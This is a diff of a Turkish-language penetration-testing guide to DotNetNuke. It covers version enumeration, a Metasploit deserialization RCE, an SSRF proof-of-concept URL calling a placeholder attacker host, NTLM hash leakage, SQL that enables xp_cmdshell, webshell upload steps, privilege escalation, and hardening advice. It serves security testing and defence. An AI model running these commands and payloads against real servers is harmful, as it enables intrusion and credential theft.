diff --git a/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md b/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md index b624a2860..a369b3c4d 100644 --- a/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md +++ b/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md @@ -4,37 +4,92 @@ ## DotNetNuke (DNN) -DNN'ye **yönetici** olarak girdiğinizde RCE elde etmek kolaydır. +DNN'ye **yönetici** olarak girdiğinizde **RCE** elde etmek kolaydır, ancak son birkaç yılda bir dizi *kimlik doğrulaması yapılmamış* ve *kimlik doğrulaması sonrası* teknik yayınlanmıştır. Aşağıdaki kılavuz, hem saldırgan hem de savunma çalışmaları için en kullanışlı temel bileşenleri toplar. -## RCE +--- +## Versiyon & Ortam Sayımı -### SQL Üzerinden +* *X-DNN* HTTP yanıt başlığını kontrol edin – genellikle tam platform sürümünü açıklar. +* Kurulum sihirbazı, `/Install/Install.aspx?mode=install` içinde sürümü sızdırır (çok eski kurulumlarda erişilebilir). +* `/API/PersonaBar/GetStatus` (9.x) düşük ayrıcalıklı kullanıcılar için `"dnnVersion"` içeren bir JSON nesnesi döner. +* Canlı bir örnekte göreceğiniz tipik çerezler: +* `.DOTNETNUKE` – ASP.NET formları kimlik doğrulama bileti. +* `DNNPersonalization` – XML/serileştirilmiş kullanıcı profili verilerini içerir (eski sürümler – aşağıdaki RCE'ye bakın). -**`Settings`** sayfasında bir SQL konsolu mevcuttur; burada **`xp_cmdshell`**'i etkinleştirebilir ve **işletim sistemi komutları** çalıştırabilirsiniz. +--- +## Kimlik Doğrulaması Yapılmamış Sömürü -**`xp_cmdshell`**'i etkinleştirmek için bu satırları kullanın: -```sql -EXEC sp_configure 'show advanced options', '1' -RECONFIGURE -EXEC sp_configure 'xp_cmdshell', '1' -RECONFIGURE +### 1. Çerez Serileştirme RCE (CVE-2017-9822 & takipleri) +*Etkilenen sürümler ≤ 9.3.0-RC* + +`DNNPersonalization`, yerleşik 404 işleyicisi etkinleştirildiğinde her istekte serileştirilir. Bu nedenle, hazırlanmış XML, keyfi gadget zincirlerine ve kod yürütmeye yol açabilir. ``` -Ve **"Run Script"** butonuna basarak o sQL cümlelerini çalıştırın. - -Ardından, OS komutlarını çalıştırmak için aşağıdakine benzer bir şey kullanın: -```sql -xp_cmdshell 'whoami' +msf> use exploit/windows/http/dnn_cookie_deserialization_rce +msf> set RHOSTS +msf> set LHOST +msf> run ``` -### ASP webshell Üzerinden +Modül, yamanmış ancak hala savunmasız olan sürümler için doğru yolu otomatik olarak seçer (CVE-2018-15811/15812/18325/18326). Sömürü, 7.x–9.1.x sürümlerinde **kimlik doğrulama olmadan** ve 9.2.x+ sürümlerinde *doğrulanmış* düşük ayrıcalıklı bir hesapla çalışır. -`Settings -> Security -> More -> More Security Settings` altında `Allowable File Extensions` kısmında **yeni izin verilen uzantılar ekleyebilirsiniz** ve ardından `Save` butonuna tıklayabilirsiniz. +### 2. Sunucu Tarafı İstek Sahteciliği (CVE-2025-32372) +*Etkilenen sürümler < 9.13.8 – Yamanın yayımlanma tarihi Nisan 2025* -**`asp`** veya **`aspx`** ekleyin ve ardından **`/admin/file-management`** altında bir **asp webshell** olan `shell.asp` dosyasını yükleyin. +Eski `DnnImageHandler` düzeltmesinin bir atlatması, bir saldırganın sunucuyu **keyfi GET istekleri** yapmaya zorlamasını sağlar (yarı-kör SSRF). Pratik etkiler: -Sonra **`/Portals/0/shell.asp`** adresine erişerek webshell'inize ulaşabilirsiniz. +* Bulut dağıtımlarında iç port taraması / meta veri hizmeti keşfi. +* Aksi takdirde İnternet'ten güvenlik duvarıyla korunmuş olan ev sahiplerine ulaşma. -### Yetki Yükseltme +Kanıt konsepti (değiştir `TARGET` & `ATTACKER`): +``` +https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc +``` +İstek arka planda tetiklenir; geri çağırmalar için dinleyicinizi izleyin. -Örneğin **Potatoes** veya **PrintSpoofer** kullanarak **yetkileri yükseltebilirsiniz**. +### 3. NTLM Hash Sızıntısı UNC Yönlendirmesi ile (CVE-2025-52488) +*Etkilenen sürümler 6.0.0 – 9.x (< 10.0.1)* +Özel olarak hazırlanmış içerik, DNN'nin `\\attacker\share\img.png` gibi bir **UNC yolu** kullanarak bir kaynağı almaya çalışmasına neden olabilir. Windows, NTLM müzakeresini memnuniyetle gerçekleştirir ve sunucu-hesap hash'lerini saldırgana sızdırır. **10.0.1** sürümüne yükseltin veya güvenlik duvarında dışa dönük SMB'yi devre dışı bırakın. + +### 4. IP Filtre Atlatma (CVE-2025-52487) +Yönetici portalı koruması için *Host/IP Filtreleri*'ne güvenen yöneticiler, **10.0.1** sürümünden önceki sürümlerin, ters proxy senaryosunda `X-Forwarded-For`'ı manipüle ederek atlatılabileceğini bilmelidir. + +--- +## Kimlik Doğrulama Sonrası RCE + +### SQL konsolu aracılığıyla +**`Ayarlar → SQL`** altında, site veritabanına karşı sorgu çalıştırmaya olanak tanıyan yerleşik bir sorgu penceresi bulunmaktadır. Microsoft SQL Server'da **`xp_cmdshell`**'i etkinleştirip komutlar başlatabilirsiniz: +```sql +EXEC sp_configure 'show advanced options', 1; +RECONFIGURE; +EXEC sp_configure 'xp_cmdshell', 1; +RECONFIGURE; +GO +xp_cmdshell 'whoami'; +``` +### ASPX webshell yükleme ile +1. **`Ayarlar → Güvenlik → Daha Fazla → Daha Fazla Güvenlik Ayarları`** kısmına gidin. +2. **İzin Verilen Dosya Uzantıları** kısmına `aspx` (veya `asp`) ekleyin ve **Kaydet** butonuna tıklayın. +3. **`/admin/file-management`** kısmına gidin ve `shell.aspx` dosyasını yükleyin. +4. Bunu **`/Portals/0/shell.aspx`** adresinde tetikleyin. + +--- +## Windows'ta Yetki Yükseltme +Kod yürütme **IIS AppPool\** olarak gerçekleştirildiğinde, yaygın Windows yetki yükseltme teknikleri geçerlidir. Eğer sistem savunmasızsa, şunları kullanabilirsiniz: + +* **PrintSpoofer** / **SpoolFool** ile *SeImpersonatePrivilege*'i kötüye kullanın. +* *Service Accounts*'tan kaçmak için **Juicy/Sharp Potatoes** kullanın. + +--- +## Güçlendirme Önerileri (Mavi Takım) + +* En az **9.13.9** sürümüne (SSRF atlatmasını düzeltir) veya tercihen **10.0.1** sürümüne yükseltin (IP filtreleme ve NTLM sorunları). +* Kurulumdan sonra kalan **`InstallWizard.aspx*`** dosyalarını kaldırın. +* Çıkış yapan SMB'yi (portlar 445/139) devre dışı bırakın. +* DNN içinde değil, kenar proxy'sinde güçlü *Host Filtreleri* uygulayın. +* Kullanılmıyorsa `/API/RemoteContentProxy` erişimini engelleyin. + +## Referanslar + +* Metasploit `dnn_cookie_deserialization_rce` modül belgeleri – pratik kimlik doğrulamasız RCE detayları (GitHub). +* GitHub Güvenlik Danışmanlığı GHSA-3f7v-qx94-666m – 2025 SSRF atlatma ve yamanma bilgileri. {{#include ../../banners/hacktricks-training.md}}